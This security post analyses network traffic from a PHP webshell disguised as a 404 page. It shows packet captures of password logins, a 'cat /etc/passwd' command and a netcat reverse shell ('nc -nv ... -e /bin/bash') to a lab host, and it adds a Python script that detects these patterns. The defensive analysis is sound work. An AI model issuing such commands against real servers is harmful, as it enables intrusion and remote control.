
404 Not Found PHP webshell backdoor: traffic analysis, screenshots, reverse shell spawn and full PCAP file download

Download Attachments

  • 1 pcap 404
    Date added: January 20, 2017 11:06 am Added by: admin File size: 76 KB Downloads: 156

The 404.php webshell backdoor is a sneaky one: if an admin browses to the PHP page it renders what looks like the server's standard "404 Not Found" error, so the file appears to be missing and benign (even though, as the capture below shows, the server actually answers 200 OK):

http://computersecurity.org/images/pcapanalysis/404_1.png

The trick to logging into the shell is to press the Tab key: a small prompt appears where you type the password to access the shell:

http://computersecurity.org/images/pcapanalysis/404_2.png


Then we log in:

http://computersecurity.org/images/pcapanalysis/404_3.png

Here is what the network traffic it generates looks like, as tcpdump ASCII (-A) output. Three hosts are involved: the web server 192.168.1.100 (Apache on port 55555), the attacker's browser 192.168.1.102, and a third machine, 192.168.1.101, that will later receive the reverse shell. First the browser fetches the page; note that the "not found" page comes back with HTTP 200 OK, a status/content mismatch worth alerting on in proxy logs:

2017-01-20 02:34:21.437548 IP 192.168.1.102.53294 > 192.168.1.100.55555: Flags [P.], seq 703:1125, ack 1011, win 2049, length 422
E…..@…e….f…d…..w….{.P…….GET /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 02:34:21.438028 IP 192.168.1.100.55555 > 192.168.1.102.53294: Flags [P.], seq 1011:1834, ack 1125, win 254, length 823
E.._.>@.@..?…d…f……{..w..P….l..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:21 GMT
Server: Apache/2.4.18 (Debian)
Set-Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 377
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[377 bytes of gzip-compressed body: the fake "404 Not Found" page, binary not reproduced here]

The attacker then presses Tab and submits a first password, letmein, on a new TCP connection (source port 53296) that carries the PHPSESSID cookie issued above. The password crosses the wire in a cleartext POST body:

2017-01-20 02:34:28.742646 IP 192.168.1.102.53296 > 192.168.1.100.55555: Flags [P.], seq 1:614, ack 1, win 2053, length 613
E…..@…d<…f…d.0..2….&u.P…    J..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 12
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

pass=letmein
2017-01-20 02:34:28.742666 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], ack 614, win 238, length 0
E..(..@.@……d…f…0.&u.2.  .P….5..
2017-01-20 02:34:28.743719 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [P.], seq 1:767, ack 614, win 238, length 766
E..&..@.@……d…f…0.&u.2.  .P….3..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:28 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 377
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

This response is 377 bytes, the same size as the fake 404 page, so letmein was rejected and the decoy page was shown again. Five seconds later the attacker tries again:

2017-01-20 02:34:33.005742 IP 192.168.1.102.53296 > 192.168.1.100.55555: Flags [P.], seq 614:1228, ack 767, win 2050, length 614
E…..@…d8…f…d.0..2.      ..&x.P….|..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 13
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

pass=password
2017-01-20 02:34:33.043487 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], ack 1228, win 248, length 0
E..(..@.@……d…f…0.&x.2…P….5..
2017-01-20 02:34:33.359844 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], seq 767:5147, ack 1228, win 248, length 4380
E..D..@.@……d…f…0.&x.2…P….Q..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:33 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4208
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

This time the body is 4,208 bytes: the password was accepted and the shell's interface comes back. Ten seconds later the attacker runs cat /etc/passwd from the shell's console. The request parameters a (action), c (current directory), p1 to p3 (arguments) and charset are the same names the WSO webshell family uses, which makes this traffic easy to fingerprint even though the file name looks harmless:

2017-01-20 02:34:43.974969 IP 192.168.1.102.53297 > 192.168.1.100.55555: Flags [P.], seq 1:688, ack 1, win 2053, length 687
E…..@…c….f…d.1..H…….P….S..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 86
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=cat+%2Fetc%2Fpasswd&p2=&p3=&charset=Windows-1251
2017-01-20 02:34:43.974988 IP 192.168.1.100.55555 > 192.168.1.102.53297: Flags [.], ack 688, win 239, length 0
E..(..@.@……d…f…1….H..mP….5..
2017-01-20 02:34:44.314752 IP 192.168.1.100.55555 > 192.168.1.102.53297: Flags [P.], seq 1:5231, ack 688, win 239, length 5230
E…..@.@..N…d…f…1….H..mP…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:43 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4840
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

The 4,840-byte response is the console page with the output of cat /etc/passwd inside it. About 46 seconds later the attacker uses the same console to start a netcat reverse shell back to the third host, 192.168.1.101, on port 4444:

2017-01-20 02:35:30.139077 IP 192.168.1.102.53304 > 192.168.1.100.55555: Flags [P.], seq 1:712, ack 1, win 2053, length 711
E….9@…c….f…d.8……….P…….POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 109
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=nc+-nv+192.168.1.101+4444+-e+%2Fbin%2Fbash&p2=&p3=&charset=Windows-1251
2017-01-20 02:35:30.139097 IP 192.168.1.100.55555 > 192.168.1.102.53304: Flags [.], ack 712, win 240, length 0
E..(.,@.@……d…f…8……..P….5..
2017-01-20 02:35:30.611285 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [S], seq 3216154078, win 29200, options [mss 1460,sackOK,TS val 759617908 ecr 0,nop,wscale 7], length 0
E..<D.@.@.q….d…e…\……….r..H………
-F.t……..
2017-01-20 02:35:30.611975 IP 192.168.1.101.4444 > 192.168.1.100.56704: Flags [S.], seq 451231491, ack 3216154079, win 14480, options [mss 1460,sackOK,TS val 287395312 ecr 759617908,nop,wscale 6], length 0
E..<..@.@……e…d.\….?…….8..#………
.!M.-F.t….
2017-01-20 02:35:30.611988 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [.], ack 1, win 229, options [nop,nop,TS val 759617909 ecr 287395312], length 0
E..4D.@.@.q….d…e…\……?……@…..
-F.u.!M.

No HTTP response to that POST appears in the capture: the PHP worker is busy running nc. Instead, half a second after the command is submitted, the web server (192.168.1.100) opens an outbound TCP connection to 192.168.1.101:4444. A web server initiating connections to an unusual port right after a POST to a PHP file is the reverse-shell signature to alert on. Six seconds later the listener types id (3 bytes including the newline) and the shell answers:

2017-01-20 02:35:36.943763 IP 192.168.1.101.4444 > 192.168.1.100.56704: Flags [P.], seq 1:4, ack 1, win 227, options [nop,nop,TS val 287395945 ecr 759617909], length 3
E..7r.@.@.C….e…d.\….?………o……
.!Pi-F.uid

2017-01-20 02:35:36.943789 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [.], ack 4, win 229, options [nop,nop,TS val 759619492 ecr 287395945], length 0
E..4D.@.@.q….d…e…\……?……@…..
-F…!Pi
2017-01-20 02:35:36.944117 IP 192.168.1.101.22 > 192.168.1.100.53010: Flags [P.], seq 353:393, ack 160, win 408, options [nop,nop,TS val 287395945 ecr 759619491], length 40
E..\.@@.@.42…e…d…..x>^’bb……n…..
.!Pi-F…<T……z.?P%#{…j.A..9..b.<…….r..
2017-01-20 02:35:36.944130 IP 192.168.1.100.53010 > 192.168.1.101.22: Flags [.], ack 393, win 951, options [nop,nop,TS val 759619492 ecr 287395945], length 0
E..4u.@.@.@….d…e….’bb..x>……@…..
-F…!Pi
2017-01-20 02:35:36.945239 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [P.], seq 1:55, ack 4, win 229, options [nop,nop,TS val 759619492 ecr 287395945], length 54
E..jD.@.@.q….d…e…\……?……v…..
-F…!Piuid=33(www-data) gid=33(www-data) groups=33(www-data)

The shell reports the web server's own identity: the attacker is now running as www-data (uid 33), the Apache user, with whatever that account can read and write. The two packets on port 22 between 192.168.1.101 and 192.168.1.100 in the middle of the exchange belong to a separate SSH session between the same hosts and are unrelated to the reverse shell.
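As an added example (not part of the original post or of the capture's tooling), the following Python script encodes the three detections discussed above and runs them over an event list reconstructed by hand from this capture: it flags cleartext password POSTs to the PHP file, recognises the WSO-style a/c/p1/charset parameter set and decodes the command, and correlates a shell-spawning command with an outbound SYN from the web server within a few seconds, then pulls the shell's output off that new connection. The Event class, the EVENTS list and all function names are the example's own; the IPs, ports, timestamps and request bodies are copied from the capture, with headers trimmed.

```python
"""Flag WSO-style webshell console use and the reverse shell it spawns.

Added example, not code from the original post. EVENTS is constructed by
hand from the capture above (IPs, ports, timestamps and request bodies
copied; headers trimmed). Nothing here reads pcap files: build Event
records from any TCP reassembler and pass them to analyze().
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import parse_qs


@dataclass
class Event:
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int
    flags: str          # tcpdump-style TCP flags: "S" = SYN, "P." = PSH/ACK
    payload: str = ""   # decoded TCP payload, empty for SYN / bare ACK


def _t(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


WEB_SERVER, WEB_PORT = "192.168.1.100", 55555      # from the capture

# Constructed from the capture above; only the packets that matter are kept.
EVENTS = [
    Event(_t("2017-01-20 02:34:21.437548"), "192.168.1.102", 53294, WEB_SERVER, WEB_PORT, "P.",
          "GET /404.php HTTP/1.1\r\nHost: 192.168.1.100:55555\r\n\r\n"),
    Event(_t("2017-01-20 02:34:28.742646"), "192.168.1.102", 53296, WEB_SERVER, WEB_PORT, "P.",
          "POST /404.php HTTP/1.1\r\nHost: 192.168.1.100:55555\r\n\r\npass=letmein"),
    Event(_t("2017-01-20 02:34:33.005742"), "192.168.1.102", 53296, WEB_SERVER, WEB_PORT, "P.",
          "POST /404.php HTTP/1.1\r\nHost: 192.168.1.100:55555\r\n\r\npass=password"),
    Event(_t("2017-01-20 02:34:43.974969"), "192.168.1.102", 53297, WEB_SERVER, WEB_PORT, "P.",
          "POST /404.php HTTP/1.1\r\nHost: 192.168.1.100:55555\r\n\r\n"
          "a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=cat+%2Fetc%2Fpasswd&p2=&p3=&charset=Windows-1251"),
    Event(_t("2017-01-20 02:35:30.139077"), "192.168.1.102", 53304, WEB_SERVER, WEB_PORT, "P.",
          "POST /404.php HTTP/1.1\r\nHost: 192.168.1.100:55555\r\n\r\n"
          "a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=nc+-nv+192.168.1.101+4444+-e+%2Fbin%2Fbash"
          "&p2=&p3=&charset=Windows-1251"),
    Event(_t("2017-01-20 02:35:30.611285"), WEB_SERVER, 56704, "192.168.1.101", 4444, "S"),
    Event(_t("2017-01-20 02:35:36.943763"), "192.168.1.101", 4444, WEB_SERVER, 56704, "P.", "id\n"),
    Event(_t("2017-01-20 02:35:36.945239"), WEB_SERVER, 56704, "192.168.1.101", 4444, "P.",
          "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"),
]

WSO_PARAMS = {"a", "c", "p1", "charset"}   # parameter set the WSO family sends
# Commands that hand a shell to a remote socket: nc/ncat -e, /dev/tcp, bash -i.
SHELL_SPAWN = re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s|/dev/tcp/|\bbash\s+-i\b")


def parse_http_request(payload):
    """Return (method, path, form_fields) for a raw HTTP request, else None."""
    head, _, body = payload.partition("\r\n\r\n")
    m = re.match(r"(GET|POST) (\S+) HTTP/1\.[01]", head)
    if not m:
        return None
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return m.group(1), m.group(2), form


def classify_request(payload):
    """Return (tag, detail) findings for one HTTP request payload."""
    parsed = parse_http_request(payload)
    if parsed is None:
        return []
    method, path, form = parsed
    findings = []
    if method == "POST" and "pass" in form:            # cleartext shell password
        findings.append(("webshell-auth", f"{path} pass={form['pass']}"))
    if WSO_PARAMS <= set(form):                        # WSO console signature
        cmd = form["p1"]                               # parse_qs already URL-decodes
        findings.append(("wso-console", f"action={form['a']} cwd={form['c']} cmd={cmd}"))
        if SHELL_SPAWN.search(cmd):
            findings.append(("shell-spawn-cmd", cmd))
    return findings


def find_reverse_shell(events, server, window=timedelta(seconds=5)):
    """Tie a shell-spawning command to a SYN the server sends out within `window`.

    Returns (command, "dst:port", what the server sent on that connection) or None.
    """
    for i, ev in enumerate(events):
        if ev.dst != server or not ev.payload:
            continue
        spawn = [d for tag, d in classify_request(ev.payload) if tag == "shell-spawn-cmd"]
        if not spawn:
            continue
        for later in events[i + 1:]:
            if later.ts - ev.ts > window:
                break
            if later.src == server and later.flags == "S":
                output = "".join(e.payload for e in events
                                 if (e.src, e.sport, e.dport) == (server, later.sport, later.dport))
                return spawn[0], f"{later.dst}:{later.dport}", output
    return None


def analyze(events=EVENTS, server=WEB_SERVER):
    """Run every detection over the event list."""
    http = [(ev.ts, f) for ev in events if ev.dst == server and ev.payload
            for f in classify_request(ev.payload)]
    return {"http_findings": http, "reverse_shell": find_reverse_shell(events, server)}


if __name__ == "__main__":
    report = analyze()
    for ts, (tag, detail) in report["http_findings"]:
        print(ts, tag, detail)
    print("reverse shell:", report["reverse_shell"])
```

On this capture the script reports two webshell-auth findings (letmein, then password), two wso-console findings, one shell-spawn-cmd, and a reverse shell to 192.168.1.101:4444 whose first output line is the uid=33(www-data) string seen in the last packet. The five-second correlation window is generous: here the SYN follows the POST by 0.47 seconds.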